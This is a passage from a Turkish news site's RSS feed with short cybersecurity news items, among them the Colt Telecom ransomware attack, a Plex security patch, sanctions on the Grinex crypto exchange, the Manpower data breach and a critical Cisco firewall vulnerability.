<p data-start="455" data-end="790"><strong data-start="455" data-end="491">Yeni güvenlik katmanları geliyor</strong><br data-start="491" data-end="494">Microsoft 365 yol haritasında yer alan güncellemeye göre Teams, sohbet ve kanallarda çalıştırılabilir dosya türlerini (örn. .exe) engelleyerek dosya tabanlı saldırılara karşı koruma sağlayacak. Ayrıca gönderilen kötü amaçlı bağlantılar otomatik olarak tespit edilip kullanıcıya uyarı verilecek.</p>
<p data-start="792" data-end="1183"><strong data-start="792" data-end="817">Defender entegrasyonu</strong><br data-start="817" data-end="820">Microsoft, Teams’in artık Defender for Office 365 Tenant Allow/Block List ile entegre olduğunu duyurdu. Bu sayede güvenlik yöneticileri engellenmiş alan adlarından gelen sohbet, kanal, toplantı ve çağrıları bloke edebilecek. Hatta bu alan adlarından gelen geçmiş iletişimler de otomatik olarak silinebilecek. Özellik Eylül 2025 sonunda genel kullanıma açılacak.</p>
<p data-start="1185" data-end="1224"><strong data-start="1185" data-end="1222">Daha önce gelen güvenlik adımları</strong></p>
<ul data-start="1225" data-end="1617">
<li data-start="1225" data-end="1406">
<p data-start="1227" data-end="1406"><strong data-start="1227" data-end="1243">Temmuz 2025:</strong> Ekran görüntüsü engelleme özelliği devreye alındı. Toplantılarda kullanıcı ekran görüntüsü almaya çalıştığında pencere siyaha düşerek bilgi sızıntısı önleniyor.</p>
</li>
<li data-start="1407" data-end="1508">
<p data-start="1409" data-end="1508"><strong data-start="1409" data-end="1424">Şubat 2025:</strong> Sohbetlerde marka taklitlerine karşı kimlik avı koruması tüm müşterilere sunuldu.</p>
</li>
<li data-start="1509" data-end="1617">
<p data-start="1511" data-end="1617"><strong data-start="1511" data-end="1539">Enterprise Connect 2024:</strong> Microsoft, Teams’in 320 milyon aylık aktif kullanıcıya ulaştığını açıkladı.</p>
</li>
</ul>
<p data-start="1619" data-end="1779"><strong data-start="1619" data-end="1648">Kullanıma sunulma takvimi</strong><br data-start="1648" data-end="1651">Yeni URL ve dosya engelleme özelliklerinin Eylül 2025’ten itibaren dünya çapında kademeli olarak devreye alınması planlanıyor.</p>
<p data-start="1781" data-end="2054"><strong data-start="1781" data-end="1793"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Colt Telecom’a WarLock fidye saldırısı: Bir milyon belge satışa çıkarıldı</title>
<link>https://www.ajansexpres.com.tr/colt-telecoma-warlock-fidye-saldirisi-bir-milyon-belge-satisa-cikarildi</link>
<guid>https://www.ajansexpres.com.tr/colt-telecoma-warlock-fidye-saldirisi-bir-milyon-belge-satisa-cikarildi</guid>
<description><![CDATA[ İngiltere merkezli Colt Technology Services, 12 Ağustos’ta başlayan siber saldırı nedeniyle Colt Online, Voice API ve portlama hizmetleri dahil birçok sistemde günlerdir kesinti yaşıyor. WarLock fidye grubu saldırıyı üstlenerek finansal, müşteri ve çalışan bilgilerini içeren bir milyon belgeyi 200 bin dolara satışa çıkardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc3bc4a59.webp" length="45616" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:07 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Colt Telecom saldırısında hangi hizmetler etkilendi, WarLock grubu hangi verileri satışa çıkardı, saldırı hangi güvenlik açığıyla ilişkilendiriliyor, şirket olayla ilgili nasıl bir açıklama yaptı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="459" data-end="790"><strong data-start="459" data-end="495">Kesinti dördüncü gününde sürüyor</strong><br data-start="495" data-end="498">Colt Telecom, 12 Ağustos’ta başlayan saldırının ardından destek hizmetlerine ait bazı sistemleri koruma amaçlı çevrim dışı bıraktı. Bu durum, müşteri iletişim platformlarını etkilerken yanıt sürelerinde gecikmelere yol açtı. Şirket, ana ağ altyapısının saldırıdan etkilenmediğini vurguladı.</p>
<p data-start="792" data-end="1240"><strong data-start="792" data-end="833">WarLock grubu verileri satışa çıkardı</strong><br data-start="833" data-end="836">‘cnkjasdfgd’ takma adlı bir tehdit aktörü, kendisini WarLock fidye yazılımı grubunun üyesi olarak tanıtarak saldırıyı üstlendi. Hacker, şirketten çaldığı bir milyon belgeyi 200 bin dolar karşılığında satışa çıkardı ve içeriğin doğruluğunu göstermek için örnekler paylaştı. Belgeler arasında mali veriler, müşteri ve çalışan kayıtları, iç yazışmalar ve yazılım geliştirme dokümanları olduğu öne sürüldü.</p>
<p data-start="1242" data-end="1565"><strong data-start="1242" data-end="1290">Microsoft SharePoint açığına işaret ediliyor</strong><br data-start="1290" data-end="1293">Siber güvenlik uzmanı Kevin Beaumont, saldırının Microsoft SharePoint’teki CVE-2025-53770 açığı üzerinden gerçekleştirilmiş olabileceğini belirtti. Bu sıfır gün açığı 18 Temmuz’dan itibaren istismar edilmiş, Microsoft ise 21 Temmuz’da güvenlik güncellemesi yayımlamıştı.</p>
<p data-start="1567" data-end="1842"><strong data-start="1567" data-end="1589">Şirketten açıklama</strong><br data-start="1589" data-end="1592">Colt, saldırıyı doğrularken çalındığı iddia edilen veriler hakkında yorum yapmadı. Şirket sözcüsü, “Siber olaya ilişkin iddiaların farkındayız. İç sistemlerimizi yeniden çalışır hale getirmek için üçüncü taraf uzmanlarla birlikte çalışıyoruz” dedi.</p>
<p data-start="1844" data-end="2058"><strong data-start="1844" data-end="1856"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Plex, kullanıcılarını uyardı: Medya sunucunuzu hemen güncelleyin</title>
<link>https://www.ajansexpres.com.tr/plex-kullanicilarini-uyardi-medya-sunucunuzu-hemen-guncelleyin</link>
<guid>https://www.ajansexpres.com.tr/plex-kullanicilarini-uyardi-medya-sunucunuzu-hemen-guncelleyin</guid>
<description><![CDATA[ Plex, 1.41.7.x ile 1.42.0.x arasındaki sürümleri etkileyen güvenlik açığı için yama yayımladı ve etkilenen kullanıcılara acil güncelleme çağrısı yaptı. Şirket ayrıntı paylaşmazken, açığın kısa sürede tersine mühendislikle istismar edilebileceği uyarısında bulunuldu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc33c7ed8.webp" length="36918" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:59 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Plex güvenlik açığı hangi sürümleri etkiliyor, yamalı sürüm hangisi, şirket neden acil güncelleme çağrısı yaptı, Plex geçmişte hangi güvenlik olaylarını yaşadı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="391" data-end="701"><strong data-start="391" data-end="425">Açık bug bounty ile bildirildi</strong><br data-start="425" data-end="428">Plex, hatayı hata ödül programı aracılığıyla öğrendiğini ve hızlıca gidererek yeni sürümü yayımladığını açıkladı. Güvenlik açığına ilişkin CVE kimliği henüz atanmamış olsa da, şirket 1.41.7.x–1.42.0.x sürümlerini çalıştıran tüm sunucuların risk altında olduğunu belirtti.</p>
<p data-start="703" data-end="909"><strong data-start="703" data-end="722">Yamalanan sürüm</strong><br data-start="722" data-end="725">Güvenlik açığını kapatan sürüm Plex Media Server 1.42.1.10060 olarak yayımlandı. Kullanıcılar, sunucu yönetim paneli veya resmi indirme sayfası üzerinden bu sürüme geçiş yapabiliyor.</p>
<p data-start="911" data-end="1217"><strong data-start="911" data-end="938">Acil güncelleme çağrısı</strong><br data-start="938" data-end="941">Plex, etkilenen kullanıcılara gönderdiği e-postalarda, sistemlerinin eski sürüm çalıştırdığını belirterek “en kısa sürede güncelleme yapın” uyarısında bulundu. Şirket, saldırganların yamaları analiz ederek istismar geliştirmesinden önce önlem alınması gerektiğini vurguladı.</p>
<p data-start="1219" data-end="1598"><strong data-start="1219" data-end="1253">Plex geçmişte de hedef olmuştu</strong><br data-start="1253" data-end="1256">Mart 2023’te CISA, Plex Media Server’daki üç yıllık bir RCE açığını (CVE-2020-5741) “aktif istismar edilen” açıklar listesine almıştı. Bu zafiyetin, LastPass’in 2022’de yaşadığı büyük veri sızıntısıyla bağlantılı olabileceği düşünülüyor. Aynı yıl Plex de kullanıcı veritabanına sızıldığını ve şifrelerin sıfırlanması gerektiğini duyurmuştu.</p>
<p data-start="1600" data-end="1632"><strong data-start="1600" data-end="1630">Kullanıcılar için öneriler</strong></p>
<ul data-start="1633" data-end="1808">
<li data-start="1633" data-end="1695">
<p data-start="1635" data-end="1695">Plex Media Server’ınızı 1.42.1.10060 sürümüne güncelleyin.</p>
</li>
<li data-start="1696" data-end="1734">
<p data-start="1698" data-end="1734">Güncellemeleri düzenli takip edin.</p>
</li>
<li data-start="1735" data-end="1808">
<p data-start="1737" data-end="1808">Sunucunuzu internet üzerinden erişime açık bırakmamaya özen gösterin.</p>
</li>
</ul>
<p data-start="1810" data-end="1988"><strong data-start="1810" data-end="1822"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD, Garantex’in halefi olarak kurulan Grinex kripto borsasına yaptırım uyguladı</title>
<link>https://www.ajansexpres.com.tr/abd-garantexin-halefi-olarak-kurulan-grinex-kripto-borsasina-yaptirim-uyguladi</link>
<guid>https://www.ajansexpres.com.tr/abd-garantexin-halefi-olarak-kurulan-grinex-kripto-borsasina-yaptirim-uyguladi</guid>
<description><![CDATA[ ABD Hazine Bakanlığı, fidye yazılımı çetelerinin kara para aklamasına aracılık eden Garantex’in yerine kurulan Grinex’e yaptırım kararı aldığını duyurdu. Grinex’in, Garantex’in kapatılmasının hemen ardından kurulduğu ve milyarlarca dolarlık kripto işlemine aracılık ettiği belirtildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc2f29f47.webp" length="40648" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:55 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Grinex kripto borsası nasıl kuruldu, Garantex hangi suçlarla ilişkilendiriliyor, ABD hangi kişi ve şirketlere yaptırım uyguladı, Dışişleri Bakanlığı ne kadar ödül teklif etti</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="425" data-end="764"><strong data-start="425" data-end="486">Garantex’in kapatılmasının ardından Grinex devreye alındı</strong><br data-start="486" data-end="489">ABD Gizli Servisi’nin Mart 2025’te Garantex’in alan adlarına el koymasının ardından şirket yöneticilerinin müşteri varlıklarını Grinex’e aktardığı tespit edildi. ABD Hazine Bakanlığı Yabancı Varlıklar Kontrol Ofisi (OFAC), dün itibarıyla Grinex’i yaptırım listesine ekledi.</p>
<p data-start="766" data-end="1082"><strong data-start="766" data-end="801">Yaptırımları aşmak için kuruldu</strong><br data-start="801" data-end="804">OFAC açıklamasında, Grinex’in tanıtım materyallerinde borsanın, Garantex’e yönelik yaptırımlar ve varlık dondurmaları sonrası kurulduğunun açıkça ifade edildiği vurgulandı. Grinex’in kuruluşundan bu yana milyarlarca dolarlık kripto para transferine aracılık ettiği belirtildi.</p>
<p data-start="1084" data-end="1364"><strong data-start="1084" data-end="1128">Garantex ve ortaklarına yeni yaptırımlar</strong><br data-start="1128" data-end="1131">OFAC ayrıca Garantex, üç kurucusu (Sergey Mendeleev, Aleksandr Mira Serda, Pavel Karavatsky) ve Rusya ile Kırgızistan’daki altı iş ortağı şirkete (InDeFi Bank, Exved, Old Vector, A7, A71, A7 Agent) yönelik yaptırımları da yeniledi.</p>
<p data-start="1366" data-end="1532"><strong data-start="1366" data-end="1382">Ödül çağrısı</strong><br data-start="1382" data-end="1385">ABD Dışişleri Bakanlığı, Garantex yöneticilerinin yakalanması veya mahkumiyetine yol açacak bilgiler için 6 milyon dolara kadar ödül teklif etti.</p>
<p data-start="1534" data-end="1872"><strong data-start="1534" data-end="1556">Geçmiş bağlantılar</strong><br data-start="1556" data-end="1559">Garantex, Hydra dark web pazarı ve Conti, Black Basta, LockBit, NetWalker, Ryuk, Phoenix Cryptolocker gibi fidye yazılımı gruplarıyla bağlantıları nedeniyle Nisan 2022’de yaptırım listesine alınmıştı. Bakanlığa göre Garantex, Nisan 2019–Mart 2025 arasında 96 milyar dolardan fazla kripto işlemine aracılık etti.</p>
<p data-start="1874" data-end="2179"><strong data-start="1874" data-end="1891">ABD’den mesaj</strong><br data-start="1891" data-end="1894">Hazine Bakanlığı Terörizm ve Mali İstihbarat Müsteşarı John K. Hurley, “Kripto borsalarını kara para aklama ve fidye yazılımlarına destek için kullanmak ulusal güvenliğimizi tehdit ediyor. Bu aktörleri ortaya çıkararak dijital varlık sektörünün bütünlüğünü korumaya kararlıyız” dedi.</p>
<p data-start="2181" data-end="2374"><strong data-start="2181" data-end="2193"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Küresel operasyonlarda siber suçlulara ait 300 milyon dolardan fazla kripto para donduruldu</title>
<link>https://www.ajansexpres.com.tr/kuresel-operasyonlarda-siber-suclulara-ait-300-milyon-dolardan-fazla-kripto-para-donduruldu</link>
<guid>https://www.ajansexpres.com.tr/kuresel-operasyonlarda-siber-suclulara-ait-300-milyon-dolardan-fazla-kripto-para-donduruldu</guid>
<description><![CDATA[ TRM Labs, Tether, TRON ve Binance’in ortak girişimiyle yürütülen T3+ Global Collaborator Programı ile Kanada ve ABD’nin iş birliğinde Chainalysis destekli operasyonlarda toplam 300 milyon dolardan fazla yasa dışı kripto varlık ele geçirildi. Fonların büyük kısmı yatırım dolandırıcılığı, kara para aklama ve aşk tuzağı (romance scam) gibi suçlarla bağlantılı çıktı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc2ad3028.webp" length="55112" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kanada-ABD ortak operasyonları hangi sonuçları verdi, hangi ülkeler mağdurlar arasında, suç gelirlerinin blockchain üzerinde nasıl engellendi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="517" data-end="921"><strong data-start="517" data-end="565">T3+ programı ile 250 milyon dolar donduruldu</strong><br data-start="565" data-end="568">Eylül 2024’te kurulan T3 Financial Crime Unit, bugüne kadar dünya genelinde 250 milyon dolarlık suç gelirini dondurdu. Bu girişim, TRM Labs, Tether ve TRON tarafından başlatıldı, Binance ise resmi katılımcı oldu. Çalışmalar kapsamında kara para aklama, yatırım dolandırıcılığı, şantaj ve terör finansmanı gibi suçlara yönelik binlerce işlem incelendi.</p>
<p data-start="923" data-end="1062">Öne çıkan vakalardan birinde, Binance iş birliğiyle “romance scam” saldırılarında elde edilen 6 milyon dolarlık kripto varlık donduruldu.</p>
<p data-start="1064" data-end="1308"><strong data-start="1064" data-end="1119">Kanada-ABD iş birliğiyle 74 milyon dolar engellendi</strong><br data-start="1119" data-end="1122">Kanada Ontario Eyalet Polisi’nin yönettiği “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu’nun yürüttüğü “Operation Avalanche”, Chainalysis analitiğiyle desteklendi.</p>
<p data-start="1310" data-end="1472">Son altı ayda 74,3 milyon dolarlık dolandırıcılık gelirine ulaşıldı ve büyük kısmı donduruldu. Tether iş birliğiyle 50 milyon dolarlık USDT kara listeye alındı.</p>
<p data-start="1474" data-end="1668"><strong data-start="1474" data-end="1490">Küresel etki</strong><br data-start="1490" data-end="1493">Project Atlas, 14 ülkede 2.000’den fazla kripto cüzdan adresini mağdurlarla ilişkilendirdi. Kanada, ABD, Almanya, Avustralya ve Birleşik Krallık mağdurlar arasında yer aldı.</p>
<p data-start="1670" data-end="1980"><strong data-start="1670" data-end="1713">Yöntem: blockchain seviyesinde müdahale</strong><br data-start="1713" data-end="1716">Her iki girişimde de koordineli operasyonlar ve blockchain düzeyinde doğrudan müdahalelerle suç gelirlerinin transfer edilmesi veya nakde çevrilmesi engellendi. Uzmanlar, bu modelin siber suçluların hareket alanını daraltmada kritik bir adım olduğunu belirtiyor.</p>
<p data-start="1982" data-end="2214"><strong data-start="1982" data-end="1994"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD’ye iade edilen hacker, vergi dolandırıcılığında 3,3 milyon dolar çalmakla suçlanıyor</title>
<link>https://www.ajansexpres.com.tr/abdye-iade-edilen-hacker-vergi-dolandiriciliginda-33-milyon-dolar-calmakla-suclaniyor</link>
<guid>https://www.ajansexpres.com.tr/abdye-iade-edilen-hacker-vergi-dolandiriciliginda-33-milyon-dolar-calmakla-suclaniyor</guid>
<description><![CDATA[ Nijerya vatandaşı Chukwuemeka Victor Amachukwu, Fransa’dan ABD’ye iade edilerek sahte vergi iadeleri ve SBA kredi başvurularıyla 3,3 milyon dolar haksız kazanç elde etmekle suçlandı. 2019-2021 arasında vergi hazırlama şirketlerine yönelik oltalama saldırılarıyla binlerce ABD vatandaşının kişisel verileri çalındı. Sanık ayrıca sahte yatırım fırsatlarıyla milyonlarca dolarlık dolandırıcılık yapmakla da itham ediliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc264b1c6.webp" length="39570" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:46 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Hacker ABD’de hangi suçlarla itham ediliyor, saldırılarda hangi yöntemler kullanıldı, toplam ne kadar mali zarar oluştu, sanığın alabileceği cezalar neler</media:keywords>
<content:encoded><![CDATA[<p data-start="568" data-end="853"><strong data-start="568" data-end="611">Vergi hazırlama şirketleri hedef alındı</strong><br data-start="611" data-end="614">ABD Adalet Bakanlığı’na göre Amachukwu, 2019–2021 arasında ABD’deki vergi hazırlama şirketlerini hedef alan oltalama e-postalarıyla sistemlere izinsiz erişim sağladı. Bu yolla binlerce vatandaşın kişisel ve vergi bilgileri ele geçirildi.</p>
<p data-start="855" data-end="1102"><strong data-start="855" data-end="884">3,3 milyon dolarlık zarar</strong><br data-start="884" data-end="887">Sanığın, 8,4 milyon dolarlık sahte vergi iadesi başvurusu yaparak yaklaşık 2,5 milyon dolar elde ettiği, ayrıca sahte SBA kredi başvurularıyla 819 bin dolar çaldığı belirtildi. Toplam zarar 3,3 milyon doları aştı.</p>
<p data-start="1104" data-end="1355"><strong data-start="1104" data-end="1138">Sahte yatırım planı da yürüttü</strong><br data-start="1138" data-end="1141">Savcılığa göre Amachukwu, aynı dönemde sahte yatırım teklifleriyle de mağdurları kandırdı. “Standby letter of credit” gibi gerçekte var olmayan finansal araçları satarak milyonlarca doları kendi hesabına aktardı.</p>
<p data-start="1357" data-end="1549"><strong data-start="1357" data-end="1383">Fransa’dan iade edildi</strong><br data-start="1383" data-end="1386">Amachukwu, 4 Ağustos 2025’te Fransa’dan ABD’ye iade edildi ve ertesi gün New York Güney Bölgesi’nde hâkim karşısına çıkarıldı. Henüz duruşma tarihi belirlenmedi.</p>
<p data-start="1551" data-end="1906"><strong data-start="1551" data-end="1584">Ciddi cezalarla karşı karşıya</strong><br data-start="1584" data-end="1587">Sanık hakkında bilgisayar korsanlığına teşebbüs (5 yıl), iki kez kablolu dolandırıcılık (her biri 20 yıl), iki kez kablolu dolandırıcılığa teşebbüs (her biri 20 yıl) ve ağırlaştırılmış kimlik hırsızlığı (zorunlu 2 yıl ek ceza) suçlamaları bulunuyor. Ayrıca elde ettiği tüm malvarlıklarına el konulması talep ediliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Manpower veri ihlali: RansomHub saldırısında 145 bin kişinin bilgileri sızdırıldı</title>
<link>https://www.ajansexpres.com.tr/manpower-veri-ihlali-ransomhub-saldirisinda-145-bin-kisinin-bilgileri-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/manpower-veri-ihlali-ransomhub-saldirisinda-145-bin-kisinin-bilgileri-sizdirildi</guid>
<description><![CDATA[ Dünyanın en büyük insan kaynakları şirketlerinden Manpower, Aralık 2024’te gerçekleşen siber saldırıda 145 bine yakın kişinin kişisel verilerinin çalındığını açıkladı. RansomHub fidye yazılımı grubu saldırıyı üstlenirken, çalınan 500 GB veride kimlik belgeleri, iletişim bilgileri, finansal kayıtlar ve gizli sözleşmelerin bulunduğu iddia edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc221ec6d.webp" length="45060" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:41 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Manpower veri ihlalinde kaç kişinin bilgileri sızdırıldı, RansomHub saldırıda hangi verileri çaldığını iddia etti, olay şirketin hangi şubesinden kaynaklandı, mağdurlara hangi destek sağlanıyor</media:keywords>
<content:encoded><![CDATA[<p data-start="488" data-end="836"><strong data-start="488" data-end="532">Saldırı franchise şubesinden kaynaklandı</strong><br data-start="532" data-end="535">ManpowerGroup’un bir parçası olan Manpower, Aralık 2024 sonunda sistemlerine yetkisiz erişim sağlandığını ve saldırganların bazı dosyaları elde etmiş olabileceğini duyurdu. Olay, 20 Ocak 2025’te Michigan’ın Lansing kentindeki bir franchise şubesinde yaşanan BT kesintisi araştırılırken ortaya çıktı.</p>
<p data-start="838" data-end="1145"><strong data-start="838" data-end="870">145 bin kişi bilgilendirildi</strong><br data-start="870" data-end="873">Maine Başsavcılığı’na yapılan bildirimde, 144.189 kişinin verilerinin saldırıdan etkilendiği belirtildi. Çalınan veriler arasında kimlik bilgileri, pasaport taramaları, sosyal güvenlik numaraları, adresler, iletişim bilgileri ve test sonuçları yer alabileceği aktarıldı.</p>
<p data-start="1147" data-end="1618"><strong data-start="1147" data-end="1179">RansomHub saldırıyı üstlendi</strong><br data-start="1179" data-end="1182">RansomHub fidye yazılımı grubu, Ocak 2025’te saldırıyı üstlendiğini açıkladı. Grup, Manpower’ın sistemlerinden yaklaşık 500 GB veri çaldığını ve bunun içinde yıllara ait yazışmalar, mali tablolar, insan kaynakları verileri, gizli sözleşmeler ve NDA’ların bulunduğunu iddia etti. Daha sonra verilerin sızdırılacağına dair paylaşımlar grubun sızdırma sitesinden kaldırıldı, bu da fidyenin ödenmiş olabileceği ihtimalini gündeme getirdi.</p>
<p data-start="1620" data-end="1957"><strong data-start="1620" data-end="1642">Şirketten açıklama</strong><br data-start="1642" data-end="1645">ManpowerGroup sözcüsü, olayın yalnızca bağımsız bir franchise şubesini etkilediğini, şirketin kurumsal ağının saldırıdan etkilenmediğini vurguladı. Şirket, FBI ile iş birliği yaptığını ve etkilenen kişilere Equifax üzerinden ücretsiz kredi izleme ve kimlik hırsızlığına karşı koruma hizmeti sunduğunu açıkladı.</p>
<p data-start="1959" data-end="2338"><strong data-start="1959" data-end="1983">RansomHub’ın geçmişi</strong><br data-start="1983" data-end="1986">RansomHub, daha önce Halliburton, Rite Aid, Kawasaki, Christie's, Frontier Communications ve Planned Parenthood gibi kurumları da hedef aldı. Grup ayrıca Change Healthcare saldırısında 190 milyondan fazla kişinin etkilendiği verileri sızdırmıştı. FBI, Ağustos 2024 itibarıyla grubun 200’den fazla kritik altyapı kuruluşunu hedef aldığını bildirmişti.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Cisco, Firewall Management Center’da en yüksek seviyeli güvenlik açığını duyurdu: Uzak kod çalıştırma riski</title>
<link>https://www.ajansexpres.com.tr/cisco-firewall-management-centerda-en-yuksek-seviyeli-guvenlik-acigini-duyurdu-uzak-kod-calistirma-riski</link>
<guid>https://www.ajansexpres.com.tr/cisco-firewall-management-centerda-en-yuksek-seviyeli-guvenlik-acigini-duyurdu-uzak-kod-calistirma-riski</guid>
<description><![CDATA[ Cisco, Secure Firewall Management Center yazılımındaki RADIUS bileşeninde keşfedilen ve CVSS 10.0 ile değerlendirilen kritik güvenlik açığını (CVE-2025-20265) duyurdu. Açık, kimlik doğrulama sırasında özel hazırlanmış girişlerle istismar edilerek yetkisiz saldırganların sistemde ayrıcalıklı komut çalıştırmasına yol açabiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc1d7c828.webp" length="48516" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-20265 açığı saldırganlara hangi imkânları veriyor, hangi FortiWeb sürümleri etkileniyor, Cisco geçici çözüm olarak ne öneriyor, şirket başka hangi açıklar için yama yayımladı</media:keywords>
<content:encoded><![CDATA[<p data-start="496" data-end="869"><strong data-start="496" data-end="520">Açığın teknik boyutu</strong><br data-start="520" data-end="523">CVE-2025-20265, RADIUS kimlik doğrulama sürecinde kullanıcı girdisinin doğru işlenmemesinden kaynaklanıyor. Etkinleştirildiğinde, saldırganların web veya SSH tabanlı yönetim arayüzüne kimlik bilgileri giriyormuş gibi davranarak özel hazırlanmış komutlar göndermesine olanak tanıyor. Bu komutlar cihazda yüksek ayrıcalıklarla çalıştırılabiliyor.</p>
<p data-start="871" data-end="1128"><strong data-start="871" data-end="901">Hangi sürümler etkileniyor</strong><br data-start="901" data-end="904">Cisco’ya göre açık, FMC yazılımının 7.0.7 ve 7.7.0 sürümlerinde, RADIUS kimlik doğrulaması aktifken ortaya çıkıyor. Bu, özellikle kurumsal ve devlet ağlarında merkezi kimlik doğrulama için sık kullanılan bir konfigürasyon.</p>
<p data-start="1130" data-end="1351"><strong data-start="1130" data-end="1158">Güncellemeler yayımlandı</strong><br data-start="1158" data-end="1161">Cisco, güvenlik açığını gidermek için ücretsiz yazılım güncellemelerini yayımladı. Yama, geçerli hizmet sözleşmesine sahip müşteriler için standart kanallar üzerinden erişilebilir durumda.</p>
<p data-start="1353" data-end="1590"><strong data-start="1353" data-end="1378">Geçici çözüm seçeneği</strong><br data-start="1378" data-end="1381">Yama yüklenemeyen ortamlarda önerilen tek geçici çözüm, RADIUS kimlik doğrulamasını devre dışı bırakarak yerine yerel kullanıcı hesapları, LDAP ya da SAML tabanlı kimlik doğrulama yöntemlerinin kullanılması.</p>
<p data-start="1592" data-end="1807"><strong data-start="1592" data-end="1619">Henüz istismar edilmedi</strong><br data-start="1619" data-end="1622">Açık, Cisco güvenlik araştırmacısı Brandon Sakai tarafından dahili testlerde keşfedildi. Şirket, açığın sahada istismar edildiğine dair herhangi bir bulguya sahip olmadığını açıkladı.</p>
<p data-start="1809" data-end="2064"><strong data-start="1809" data-end="1833">Ek güvenlik yamaları</strong><br data-start="1833" data-end="1836">Cisco ayrıca Snort 3, ASA, FTD, IOS ve IOS XE gibi ürünlerde hizmet reddi (DoS) ve HTML enjeksiyonu gibi 13 yüksek önem dereceli güvenlik açığını da kapattı. Bu açıkların hiçbirinin aktif olarak istismar edildiği raporlanmadı.</p>
<p>beykoz haber</p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>300 milyon dolarlık kripto para siber dolandırıcılık operasyonlarında donduruldu</title>
<link>https://www.ajansexpres.com.tr/300-milyon-dolarlik-kripto-para-siber-dolandiricilik-operasyonlarinda-donduruldu</link>
<guid>https://www.ajansexpres.com.tr/300-milyon-dolarlik-kripto-para-siber-dolandiricilik-operasyonlarinda-donduruldu</guid>
<description><![CDATA[ Uluslararası iş birliğiyle yürütülen iki ayrı girişimde, siber suç ve dolandırıcılık faaliyetlerinden elde edildiği tespit edilen 300 milyon dolardan fazla kripto varlık donduruldu. TRM Labs, Tether, Binance ve Chainalysis gibi büyük blockchain şirketlerinin destek verdiği operasyonlarda, çok sayıda ülkede kara para aklama, yatırım dolandırıcılığı ve fidye yazılımı gibi suçlara karşı adımlar atıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc18f3832.webp" length="45512" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:32 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="543" data-end="799">Siber suçlarla bağlantılı kripto paraların izlenmesi ve engellenmesine yönelik iki farklı girişim kapsamında, 300 milyon dolardan fazla değerde dijital varlık donduruldu. Çalışmalar, uluslararası kolluk kuvvetleri ile özel sektör iş birliğinde yürütüldü.</p>
<p data-start="801" data-end="1203"><strong data-start="801" data-end="820">T3 FCU girişimi</strong><br data-start="820" data-end="823">TRM Labs, TRON ve Tether tarafından 2024 yılında başlatılan T3 Finansal Suç Birimi (T3 FCU), bugüne kadar 250 milyon doların üzerinde suç gelirini dondurdu. Binance’in ilk resmi üye olarak katıldığı girişimde, milyonlarca işlem analiz edilerek kara para aklama, yatırım dolandırıcılığı, terör finansmanı ve fidye yazılımları gibi vakalarla ilgili soruşturmalara destek sağlandı.</p>
<p data-start="1205" data-end="1461">TRM Labs tarafından yapılan açıklamada, Eylül 2024’ten bu yana beş kıtada 3 milyar doların üzerinde işlem hacminin izlendiği, bu kapsamda özellikle “romantik tuzak” adı verilen dolandırıcılık yöntemlerine yönelik 6 milyon doların dondurulduğu belirtildi.</p>
